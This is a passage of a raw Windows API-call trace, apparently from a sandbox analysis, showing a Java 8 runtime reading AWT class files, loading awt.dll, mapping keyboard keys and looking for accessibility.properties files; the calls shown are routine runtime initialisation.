lpNumberOfBytesRead=0x208c820*=0x1e, lpOverlapped=0x0) returned 1 [0125.597] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3082e32, lpNewFilePointer=0x208c8b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c8b0*=50867762) returned 1 [0125.597] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x278, lpNumberOfBytesRead=0x208c880, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208c880*=0x278, lpOverlapped=0x0) returned 1 [0125.597] free (_Block=0x12dda860) [0125.598] free (_Block=0x12e5f420) [0125.602] strlen (_Str="sun/awt/resources/awt") returned 0x15 [0125.603] strlen (_Str="sun/awt/resources/awt.class") returned 0x1b [0125.603] malloc (_Size=0x48) returned 0x12e5f4c0 [0125.603] malloc (_Size=0xa0) returned 0x12dab890 [0125.603] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34160fd, lpNewFilePointer=0x208d0a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d0a0*=54616317) returned 1 [0125.603] ReadFile (in: hFile=0x134, lpBuffer=0x12dab890, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d070, lpOverlapped=0x0 | out: lpBuffer=0x12dab890*, lpNumberOfBytesRead=0x208d070*=0xa0, lpOverlapped=0x0) returned 1 [0125.603] malloc (_Size=0x1c) returned 0x12ddb130 [0125.603] strlen (_Str="sun/awt/resources/awt.class") returned 0x1b [0125.603] strcpy (in: _Dest=0x208d220, _Source="sun/awt/resources/awt.class" | out: _Dest="sun/awt/resources/awt.class") returned="sun/awt/resources/awt.class" [0125.603] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30808c5, lpNewFilePointer=0x208cca0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cca0*=50858181) returned 1 [0125.603] ReadFile (in: hFile=0x134, lpBuffer=0x208ccf0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cc70, lpOverlapped=0x0 | out: lpBuffer=0x208ccf0*, lpNumberOfBytesRead=0x208cc70*=0x1e, lpOverlapped=0x0) returned 1 [0125.604] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30808fe, lpNewFilePointer=0x208cd00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd00*=50858238) returned 1 [0125.604] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x24f7, lpNumberOfBytesRead=0x208ccd0, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208ccd0*=0x24f7, lpOverlapped=0x0) returned 1 [0125.605] free (_Block=0x12dda710) [0125.606] free (_Block=0x12e60b40) [0125.612] strlen (_Str="java/util/ListResourceBundle.class") returned 0x22 [0125.612] malloc (_Size=0x48) returned 0x12e60b40 [0125.612] malloc (_Size=0xa0) returned 0x12dabc00 [0125.612] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34160ad, lpNewFilePointer=0x208c660, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c660*=54616237) returned 1 [0125.612] ReadFile (in: hFile=0x134, lpBuffer=0x12dabc00, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c630, lpOverlapped=0x0 | out: lpBuffer=0x12dabc00*, lpNumberOfBytesRead=0x208c630*=0xa0, lpOverlapped=0x0) returned 1 [0125.612] malloc (_Size=0x23) returned 0x12dda650 [0125.612] strlen (_Str="java/util/ListResourceBundle.class") returned 0x22 [0125.613] strcpy (in: _Dest=0x208c7e0, _Source="java/util/ListResourceBundle.class" | out: _Dest="java/util/ListResourceBundle.class") returned="java/util/ListResourceBundle.class" [0125.613] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x308028f, lpNewFilePointer=0x208c260, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c260*=50856591) returned 1 [0125.613] ReadFile (in: hFile=0x134, lpBuffer=0x208c2b0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c230, lpOverlapped=0x0 | out: lpBuffer=0x208c2b0*, lpNumberOfBytesRead=0x208c230*=0x1e, lpOverlapped=0x0) returned 1 [0125.613] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30802cf, lpNewFilePointer=0x208c2c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c2c0*=50856655) returned 1 [0125.613] ReadFile (in: hFile=0x134, lpBuffer=0x1227cb10, nNumberOfBytesToRead=0x5f6, lpNumberOfBytesRead=0x208c290, lpOverlapped=0x0 | out: lpBuffer=0x1227cb10*, lpNumberOfBytesRead=0x208c290*=0x5f6, lpOverlapped=0x0) returned 1 [0125.613] free (_Block=0x12ddb130) [0125.614] free (_Block=0x12e5f4c0) [0125.627] strlen (_Str="java/awt/Toolkit$3.class") returned 0x18 [0125.627] malloc (_Size=0x48) returned 0x12e5f150 [0125.627] malloc (_Size=0xa0) returned 0x12dabb50 [0125.627] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3416067, lpNewFilePointer=0x208dd70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dd70*=54616167) returned 1 [0125.627] ReadFile (in: hFile=0x134, lpBuffer=0x12dabb50, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dd40, lpOverlapped=0x0 | out: lpBuffer=0x12dabb50*, lpNumberOfBytesRead=0x208dd40*=0xa0, lpOverlapped=0x0) returned 1 [0125.627] malloc (_Size=0x19) returned 0x12ddafb0 [0125.628] strlen (_Str="java/awt/Toolkit$3.class") returned 0x18 [0125.628] strcpy (in: _Dest=0x208def0, _Source="java/awt/Toolkit$3.class" | out: _Dest="java/awt/Toolkit$3.class") returned="java/awt/Toolkit$3.class" [0125.628] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3080022, lpNewFilePointer=0x208d970, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d970*=50855970) returned 1 [0125.628] ReadFile (in: hFile=0x134, lpBuffer=0x208d9c0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d940, lpOverlapped=0x0 | out: lpBuffer=0x208d9c0*, lpNumberOfBytesRead=0x208d940*=0x1e, lpOverlapped=0x0) returned 1 [0125.628] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3080058, lpNewFilePointer=0x208d9d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d9d0*=50856024) returned 1 [0125.628] ReadFile (in: hFile=0x134, lpBuffer=0x20fe980, nNumberOfBytesToRead=0x237, lpNumberOfBytesRead=0x208d9a0, lpOverlapped=0x0 | out: lpBuffer=0x20fe980*, lpNumberOfBytesRead=0x208d9a0*=0x237, lpOverlapped=0x0) returned 1 [0125.629] free (_Block=0x12dda650) [0125.630] free (_Block=0x12e60b40) [0125.636] strlen (_Str="") returned 0x0 [0125.636] strlen (_Str=".dll") returned 0x4 [0125.636] strlen (_Str="") returned 0x0 [0125.636] strlen (_Str=".dll") returned 0x4 [0125.636] GetModuleHandleA (lpModuleName=0x0) returned 0x7ff7d5e70000 [0125.636] malloc (_Size=0x8) returned 0x121a5610 [0125.636] strlen (_Str="awt.dll") returned 0x7 [0125.637] malloc (_Size=0x8) returned 0x1322f320 [0125.637] strcpy (in: _Dest=0x1322f320, _Source="awt.dll" | out: _Dest="awt.dll") returned="awt.dll" [0125.637] free (_Block=0x121a5610) [0125.637] strlen (_Str="awt.dll") returned 0x7 [0125.637] strlen (_Str="awt") returned 0x3 [0125.637] strlen (_Str="_JNI_OnLoad@8") returned 0xd [0125.637] malloc (_Size=0x12) returned 0x12f4e420 [0125.637] strncpy (in: _Dest=0x12f4e420, _Source="_JNI_OnLoad@8", _Count=0xb | out: _Dest="_JNI_OnLoad") returned="_JNI_OnLoad" [0125.637] strcat (in: _Dest=0x12f4e420, _Source="_" | out: _Dest="_JNI_OnLoad_") returned="_JNI_OnLoad_" [0125.637] strcat (in: _Dest=0x12f4e420, _Source="awt" | out: _Dest="_JNI_OnLoad_awt") returned="_JNI_OnLoad_awt" [0125.637] strcat (in: _Dest=0x12f4e420, _Source="@8" | out: _Dest="_JNI_OnLoad_awt@8") returned="_JNI_OnLoad_awt@8" [0125.637] free (_Block=0x12f4e420) [0125.637] strlen (_Str="awt") returned 0x3 [0125.637] strlen (_Str="JNI_OnLoad") returned 0xa [0125.637] malloc (_Size=0xf) returned 0x12f4e5c0 [0125.637] strcpy (in: _Dest=0x12f4e5c0, _Source="JNI_OnLoad" | out: _Dest="JNI_OnLoad") returned="JNI_OnLoad" [0125.637] strcat (in: _Dest=0x12f4e5c0, _Source="_" | out: _Dest="JNI_OnLoad_") returned="JNI_OnLoad_" [0125.637] strcat (in: _Dest=0x12f4e5c0, _Source="awt" | out: _Dest="JNI_OnLoad_awt") returned="JNI_OnLoad_awt" [0125.638] free (_Block=0x12f4e5c0) [0125.638] free (_Block=0x1322f320) [0125.638] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\awt.dll") returned 0x2e [0125.638] malloc (_Size=0x68) returned 0x12ec3f50 [0125.638] wcscpy (in: _Dest=0x12ec3f50, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\awt.dll" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\awt.dll") returned="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\awt.dll" [0125.638] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\awt.dll", nBufferLength=0x9, lpBuffer=0x208d248, lpFilePart=0x208d240 | out: lpBuffer="", lpFilePart=0x208d240*=0x0) returned 0x2f [0125.638] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\awt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_171\\bin\\awt.dll"), fInfoLevelId=0x0, lpFileInformation=0x208cfe0 | out: lpFileInformation=0x208cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb165611, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb165611, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb165611, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x1725c8)) returned 1 [0125.642] free (_Block=0x12ec3f50) [0125.642] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\bin") returned 0x26 [0125.642] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\awt.dll") returned 0x2e [0125.642] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\awt.dll", lpFindFileData=0x208d2b0 | out: lpFindFileData=0x208d2b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb165611, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb165611, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb165611, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x1725c8, dwReserved0=0x0, dwReserved1=0x2207ae0, cFileName="awt.dll", cAlternateFileName="")) returned 0x425fc0 [0125.643] FindClose (in: hFindFile=0x425fc0 | out: hFindFile=0x425fc0) returned 1 [0125.643] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\bin") returned 0x26 [0125.643] wcslen (_String="awt.dll") returned 0x7 [0125.643] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\awt.dll") returned 0x2e [0125.643] malloc (_Size=0x2f) returned 0x12ef4c90 [0128.000] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x208ce50 | out: lpSystemTimeAsFileTime=0x208ce50*(dwLowDateTime=0x2e4e9a68, dwHighDateTime=0x1d80c8a)) [0128.000] GetCurrentProcessId () returned 0x1250 [0128.000] GetCurrentThreadId () returned 0x12e4 [0128.000] GetTickCount () returned 0x151e5f4 [0128.000] QueryPerformanceCounter (in: lpPerformanceCount=0x208ce58 | out: lpPerformanceCount=0x208ce58*=2224310287306) returned 1 [0128.001] _malloc_crt () returned 0x12f097d0 [0128.002] __dllonexit () returned 0x722a62ac8000000 [0128.002] __dllonexit () returned 0x722a628e8000000 [0128.003] getenv (_VarName="J2D_D3D_NO_HWCHECK") returned 0x0 [0128.006] __dllonexit () returned 0x722ad0a28000000 [0128.006] __dllonexit () returned 0x722ad0628000000 [0128.008] __dllonexit () returned 0x722ad0168000000 [0128.009] __dllonexit () returned 0x722ad0228000000 [0128.011] calloc (_Count=0x1d, _Size=0x8) returned 0x130558a0 [0128.012] malloc (_Size=0x10) returned 0x12f4e760 [0128.012] __dllonexit () returned 0x722ad02c8000000 [0128.013] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x7ffb60b10000 [0128.014] GetProcAddress (hModule=0x7ffb60b10000, lpProcName=0x6f3ff7ac) returned 0x7ffb60b35450 [0128.014] RegisterClipboardFormatW (lpszFormat="SunAwtComponent") returned 0xc1de [0128.017] __dllonexit () returned 0x722ad19e8000000 [0128.017] __dllonexit () returned 0x722ad1f68000000 [0128.018] GetProcAddress (hModule=0x7ffb60b10000, lpProcName="GetKeyboardLayout") returned 0x7ffb60b35870 [0128.018] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0128.018] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0128.019] GetLocaleInfoW (in: Locale=0x409, LCType=0x1004, lpLCData=0x208cd70, cchData=7 | out: lpLCData="1252") returned 5 [0128.019] _wtoi (_String="1252") returned 1252 [0128.020] __dllonexit () returned 0x722ad1e08000000 [0128.021] GetProcAddress (hModule=0x7ffb60b10000, lpProcName="GetDoubleClickTime") returned 0x7ffb60b43540 [0128.021] GetDoubleClickTime () returned 0x1f4 [0128.021] GetProcAddress (hModule=0x7ffb60b10000, lpProcName="GetSystemMetrics") returned 0x7ffb60b229f0 [0128.022] GetSystemMetrics (nIndex=36) returned 4 [0128.022] GetSystemMetrics (nIndex=37) returned 4 [0128.022] __dllonexit () returned 0x722ad1888000000 [0128.023] malloc (_Size=0x58) returned 0x13061b20 [0128.023] __dllonexit () returned 0x722ad1ba8000000 [0128.024] GetProcAddress (hModule=0x7ffb60b10000, lpProcName="RegisterClipboardFormatW") returned 0x7ffb60b35450 [0128.024] RegisterClipboardFormatW (lpszFormat="Performed DropEffect") returned 0xc0a0 [0128.025] RegisterClipboardFormatW (lpszFormat="FileGroupDescriptorW") returned 0xc09a [0128.025] RegisterClipboardFormatW (lpszFormat="FileGroupDescriptor") returned 0xc099 [0128.025] RegisterClipboardFormatW (lpszFormat="FileContents") returned 0xc098 [0128.025] RegisterClipboardFormatW (lpszFormat="_SUNW_JAVA_AWT_PROCESS_ID") returned 0xc1d9 [0128.026] malloc (_Size=0xa0) returned 0x12dac020 [0128.026] __dllonexit () returned 0x722ad1608000000 [0128.027] calloc (_Count=0x1d, _Size=0x8) returned 0x13056a70 [0128.027] __dllonexit () returned 0x722ad16c8000000 [0128.027] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows", ulOptions=0x0, samDesired=0x1, phkResult=0x208cdb0 | out: phkResult=0x208cdb0*=0x318) returned 0x0 [0128.028] RegQueryValueExW (in: hKey=0x318, lpValueName="GDIProcessHandleQuota", lpReserved=0x0, lpType=0x0, lpData=0x208cda8, lpcbData=0x208cda0*=0x4 | out: lpType=0x0, lpData=0x208cda8*=0x10, lpcbData=0x208cda0*=0x4) returned 0x0 [0128.028] RegCloseKey (hKey=0x318) returned 0x0 [0128.028] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0128.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x1004, lpLCData=0x208cd70, cchData=7 | out: lpLCData="1252") returned 5 [0128.028] _wtoi (_String="1252") returned 1252 [0128.028] calloc (_Count=0x1d, _Size=0x8) returned 0x130562f0 [0128.028] malloc (_Size=0x10) returned 0x12f4e5c0 [0128.028] __dllonexit () returned 0x722ad1168000000 [0128.030] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x318 [0128.031] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x320 [0128.031] malloc (_Size=0x40) returned 0x12e60b40 [0128.031] malloc (_Size=0x2000) returned 0x12e2bfc0 [0128.031] GetProcAddress (hModule=0x7ffb60b10000, lpProcName="MapVirtualKeyExW") returned 0x7ffb60b6caf0 [0128.033] MapVirtualKeyExW (uCode=0x20, uMapType=0x0, dwhkl=0x4090409) returned 0x39 [0128.033] MapVirtualKeyExW (uCode=0xba, uMapType=0x0, dwhkl=0x4090409) returned 0x27 [0128.034] GetProcAddress (hModule=0x7ffb60b10000, lpProcName="ToAsciiEx") returned 0x7ffb60b62fe0 [0128.035] ToAsciiEx (in: uVirtKey=0xba, uScanCode=0x27, lpKeyState=0x208cc00, lpChar=0x208cbf0, uFlags=0x0, dwhkl=0x4090409 | out: lpChar=0x208cbf0) returned 1 [0128.035] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x208cbf0, cbMultiByte=1, lpWideCharStr=0x208cbf8, cchWideChar=2 | out: lpWideCharStr=";") returned 1 [0128.036] MapVirtualKeyExW (uCode=0xbb, uMapType=0x0, dwhkl=0x4090409) returned 0xd [0128.036] ToAsciiEx (in: uVirtKey=0xbb, uScanCode=0xd, lpKeyState=0x208cc00, lpChar=0x208cbf0, uFlags=0x0, dwhkl=0x4090409 | out: lpChar=0x208cbf0) returned 1 [0128.036] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x208cbf0, cbMultiByte=1, lpWideCharStr=0x208cbf8, cchWideChar=2 | out: lpWideCharStr="=") returned 1 [0128.036] MapVirtualKeyExW (uCode=0xbc, uMapType=0x0, dwhkl=0x4090409) returned 0x33 [0128.036] ToAsciiEx (in: uVirtKey=0xbc, uScanCode=0x33, lpKeyState=0x208cc00, lpChar=0x208cbf0, uFlags=0x0, dwhkl=0x4090409 | out: lpChar=0x208cbf0) returned 1 [0128.036] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x208cbf0, cbMultiByte=1, lpWideCharStr=0x208cbf8, cchWideChar=2 | out: lpWideCharStr=",") returned 1 [0128.036] MapVirtualKeyExW (uCode=0xbd, uMapType=0x0, dwhkl=0x4090409) returned 0xc [0128.037] ToAsciiEx (in: uVirtKey=0xbd, uScanCode=0xc, lpKeyState=0x208cc00, lpChar=0x208cbf0, uFlags=0x0, dwhkl=0x4090409 | out: lpChar=0x208cbf0) returned 1 [0128.037] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x208cbf0, cbMultiByte=1, lpWideCharStr=0x208cbf8, cchWideChar=2 | out: lpWideCharStr="-") returned 1 [0128.037] MapVirtualKeyExW (uCode=0xbe, uMapType=0x0, dwhkl=0x4090409) returned 0x34 [0128.037] ToAsciiEx (in: uVirtKey=0xbe, uScanCode=0x34, lpKeyState=0x208cc00, lpChar=0x208cbf0, uFlags=0x0, dwhkl=0x4090409 | out: lpChar=0x208cbf0) returned 1 [0128.037] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x208cbf0, cbMultiByte=1, lpWideCharStr=0x208cbf8, cchWideChar=2 | out: lpWideCharStr=".") returned 1 [0128.037] MapVirtualKeyExW (uCode=0xbf, uMapType=0x0, dwhkl=0x4090409) returned 0x35 [0128.037] ToAsciiEx (in: uVirtKey=0xbf, uScanCode=0x35, lpKeyState=0x208cc00, lpChar=0x208cbf0, uFlags=0x0, dwhkl=0x4090409 | out: lpChar=0x208cbf0) returned 1 [0128.037] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x208cbf0, cbMultiByte=1, lpWideCharStr=0x208cbf8, cchWideChar=2 | out: lpWideCharStr="/") returned 1 [0128.037] MapVirtualKeyExW (uCode=0xc0, uMapType=0x0, dwhkl=0x4090409) returned 0x29 [0128.037] ToAsciiEx (in: uVirtKey=0xc0, uScanCode=0x29, lpKeyState=0x208cc00, lpChar=0x208cbf0, uFlags=0x0, dwhkl=0x4090409 | out: lpChar=0x208cbf0) returned 1 [0128.038] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x208cbf0, cbMultiByte=1, lpWideCharStr=0x208cbf8, cchWideChar=2 | out: lpWideCharStr="`") returned 1 [0128.038] MapVirtualKeyExW (uCode=0xdb, uMapType=0x0, dwhkl=0x4090409) returned 0x1a [0128.038] ToAsciiEx (in: uVirtKey=0xdb, uScanCode=0x1a, lpKeyState=0x208cc00, lpChar=0x208cbf0, uFlags=0x0, dwhkl=0x4090409 | out: lpChar=0x208cbf0) returned 1 [0128.038] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x208cbf0, cbMultiByte=1, lpWideCharStr=0x208cbf8, cchWideChar=2 | out: lpWideCharStr="[") returned 1 [0128.038] MapVirtualKeyExW (uCode=0xdc, uMapType=0x0, dwhkl=0x4090409) returned 0x2b [0128.038] ToAsciiEx (in: uVirtKey=0xdc, uScanCode=0x2b, lpKeyState=0x208cc00, lpChar=0x208cbf0, uFlags=0x0, dwhkl=0x4090409 | out: lpChar=0x208cbf0) returned 1 [0128.038] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x208cbf0, cbMultiByte=1, lpWideCharStr=0x208cbf8, cchWideChar=2 | out: lpWideCharStr="\\") returned 1 [0128.038] MapVirtualKeyExW (uCode=0xdd, uMapType=0x0, dwhkl=0x4090409) returned 0x1b [0128.038] ToAsciiEx (in: uVirtKey=0xdd, uScanCode=0x1b, lpKeyState=0x208cc00, lpChar=0x208cbf0, uFlags=0x0, dwhkl=0x4090409 | out: lpChar=0x208cbf0) returned 1 [0128.038] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x208cbf0, cbMultiByte=1, lpWideCharStr=0x208cbf8, cchWideChar=2 | out: lpWideCharStr="]") returned 1 [0128.038] MapVirtualKeyExW (uCode=0xde, uMapType=0x0, dwhkl=0x4090409) returned 0x28 [0128.038] ToAsciiEx (in: uVirtKey=0xde, uScanCode=0x28, lpKeyState=0x208cc00, lpChar=0x208cbf0, uFlags=0x0, dwhkl=0x4090409 | out: lpChar=0x208cbf0) returned 1 [0128.038] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x208cbf0, cbMultiByte=1, lpWideCharStr=0x208cbf8, cchWideChar=2 | out: lpWideCharStr="'") returned 1 [0128.039] MapVirtualKeyExW (uCode=0xdf, uMapType=0x0, dwhkl=0x4090409) returned 0x0 [0128.039] ToAsciiEx (in: uVirtKey=0xdf, uScanCode=0x0, lpKeyState=0x208cc00, lpChar=0x208cbf0, uFlags=0x0, dwhkl=0x4090409 | out: lpChar=0x208cbf0) returned 0 [0128.039] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x208cbf0, cbMultiByte=1, lpWideCharStr=0x208cbf8, cchWideChar=2 | out: lpWideCharStr="") returned 1 [0128.039] MapVirtualKeyExW (uCode=0xe2, uMapType=0x0, dwhkl=0x4090409) returned 0x56 [0128.039] ToAsciiEx (in: uVirtKey=0xe2, uScanCode=0x56, lpKeyState=0x208cc00, lpChar=0x208cbf0, uFlags=0x0, dwhkl=0x4090409 | out: lpChar=0x208cbf0) returned 1 [0128.039] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x208cbf0, cbMultiByte=1, lpWideCharStr=0x208cbf8, cchWideChar=2 | out: lpWideCharStr="\\") returned 1 [0128.039] GetProcAddress (hModule=0x7ffb60b10000, lpProcName="GetKeyboardState") returned 0x7ffb60b42d80 [0128.039] GetKeyboardState (in: lpKeyState=0x6f41e208 | out: lpKeyState=0x6f41e208) returned 1 [0128.039] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x324 [0128.040] __dllonexit () returned 0x722ad13a8000000 [0128.040] GetDoubleClickTime () returned 0x1f4 [0128.040] GetSystemMetrics (nIndex=36) returned 4 [0128.040] GetSystemMetrics (nIndex=37) returned 4 [0128.040] __dllonexit () returned 0x722ad2f28000000 [0128.040] strlen (_Str="_JNI_OnLoad@8") returned 0xd [0128.040] malloc (_Size=0xf) returned 0x12f4e600 [0128.040] strcpy (in: _Dest=0x12f4e600, _Source="_JNI_OnLoad@8" | out: _Dest="_JNI_OnLoad@8") returned="_JNI_OnLoad@8" [0128.043] free (_Block=0x12f4e600) [0128.043] strlen (_Str="JNI_OnLoad") returned 0xa [0128.043] malloc (_Size=0xc) returned 0x12f4e280 [0128.043] strcpy (in: _Dest=0x12f4e280, _Source="JNI_OnLoad" | out: _Dest="JNI_OnLoad") returned="JNI_OnLoad" [0128.044] free (_Block=0x12f4e280) [0128.044] free (_Block=0x12ef4c90) [0128.047] strlen (_Str="java/awt/Toolkit$1.class") returned 0x18 [0128.047] malloc (_Size=0x48) returned 0x12e5f420 [0128.047] malloc (_Size=0xa0) returned 0x12daafa0 [0128.048] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3416021, lpNewFilePointer=0x208dd60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dd60*=54616097) returned 1 [0128.048] ReadFile (in: hFile=0x134, lpBuffer=0x12daafa0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dd30, lpOverlapped=0x0 | out: lpBuffer=0x12daafa0*, lpNumberOfBytesRead=0x208dd30*=0xa0, lpOverlapped=0x0) returned 1 [0128.048] malloc (_Size=0x19) returned 0x12ddab00 [0128.048] free (_Block=0x12daafa0) [0128.048] strlen (_Str="java/awt/Toolkit$1.class") returned 0x18 [0128.049] strcpy (in: _Dest=0x208dee0, _Source="java/awt/Toolkit$1.class" | out: _Dest="java/awt/Toolkit$1.class") returned="java/awt/Toolkit$1.class" [0128.049] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x307f905, lpNewFilePointer=0x208d960, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d960*=50854149) returned 1 [0128.049] ReadFile (in: hFile=0x134, lpBuffer=0x208d9b0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d930, lpOverlapped=0x0 | out: lpBuffer=0x208d9b0*, lpNumberOfBytesRead=0x208d930*=0x1e, lpOverlapped=0x0) returned 1 [0128.049] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x307f93b, lpNewFilePointer=0x208d9c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d9c0*=50854203) returned 1 [0128.050] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x6e7, lpNumberOfBytesRead=0x208d990, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208d990*=0x6e7, lpOverlapped=0x0) returned 1 [0128.050] free (_Block=0x12ddafb0) [0128.050] free (_Block=0x12e5f150) [0128.059] wcslen (_String="C:\\Users\\RDhJ0CNFevzX\\.accessibility.properties") returned 0x2f [0128.059] malloc (_Size=0x6a) returned 0x12dca040 [0128.059] wcscpy (in: _Dest=0x12dca040, _Source="C:\\Users\\RDhJ0CNFevzX\\.accessibility.properties" | out: _Dest="C:\\Users\\RDhJ0CNFevzX\\.accessibility.properties") returned="C:\\Users\\RDhJ0CNFevzX\\.accessibility.properties" [0128.059] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\.accessibility.properties" (normalized: "c:\\users\\rdhj0cnfevzx\\.accessibility.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0128.060] free (_Block=0x12dca040) [0128.060] malloc (_Size=0x200) returned 0x12e035f0 [0128.060] GetLastError () returned 0x2 [0128.060] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x12e035f0, nSize=0x100, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0128.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="The system cannot find the file specified", cchWideChar=41, lpMultiByteStr=0x208de60, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The system cannot find the file specified", lpUsedDefaultChar=0x0) returned 41 [0128.080] free (_Block=0x12e035f0) [0128.083] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\accessibility.properties") returned 0x3f [0128.083] malloc (_Size=0x8a) returned 0x12ed4440 [0128.083] wcscpy (in: _Dest=0x12ed4440, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\accessibility.properties" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\accessibility.properties") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\accessibility.properties" [0128.083] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\accessibility.properties" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\accessibility.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 